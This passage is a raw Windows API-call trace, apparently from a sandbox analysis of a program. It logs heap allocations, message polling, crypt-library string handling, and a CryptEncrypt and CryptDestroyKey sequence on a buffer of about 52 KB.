[0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.312] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0173.312] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2708 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2898 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d460 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0173.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0173.312] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.312] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.312] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.312] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.312] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.312] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.313] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0173.313] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.313] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.313] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.313] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.313] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.313] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0173.313] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.313] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.313] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.313] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.313] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.329] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.329] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.329] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.329] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.330] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.330] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0xce08, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0xce10) returned 1 [0173.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2878 [0173.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0173.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0173.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0173.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0173.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0173.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2868 [0173.330] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0173.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.330] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0173.330] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.331] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.331] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2878 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.331] CharLowerBuffW (in: lpsz="byte[52753]", cchLength=0xb | out: lpsz="byte[52753]") returned 0xb [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0173.331] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0173.331] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0173.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0173.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0173.332] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.334] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0173.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0173.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.334] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.334] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0173.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0173.334] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0173.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0173.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2898 [0173.334] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0173.335] CryptEncrypt (in: hKey=0x90aed8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x9d1f90*, pdwDataLen=0x87e820*=0xce08, dwBufLen=0xce10 | out: pbData=0x9d1f90*, pdwDataLen=0x87e820*=0xce10) returned 1 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df050 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0173.335] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.335] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.335] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def60 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.335] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d480 [0173.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0173.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0173.336] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0173.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d480 [0173.338] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0173.338] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.338] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0173.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.338] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0173.338] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.338] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0173.338] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2708 [0173.338] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0173.339] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0173.339] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0173.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0173.339] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.339] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0173.339] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0173.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0173.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0f0 [0173.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0173.339] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.343] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0173.343] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0173.344] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.344] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0173.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0173.344] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.348] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.348] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.348] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2708 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0173.349] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0173.349] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def38 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2758 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0173.349] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0173.349] PeekMessageW (in: lpMsg=0x87e9fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e9fc) returned 0 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2698 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0173.349] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.349] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.349] CryptDestroyKey (hKey=0x90aed8) returned 1 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2838 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0173.350] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26d8 [0173.350] PeekMessageW (in: lpMsg=0x87f04c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f04c) returned 0 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2678 [0173.350] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0173.350] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0173.350] PeekMessageW (in: lpMsg=0x87edf4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87edf4) returned 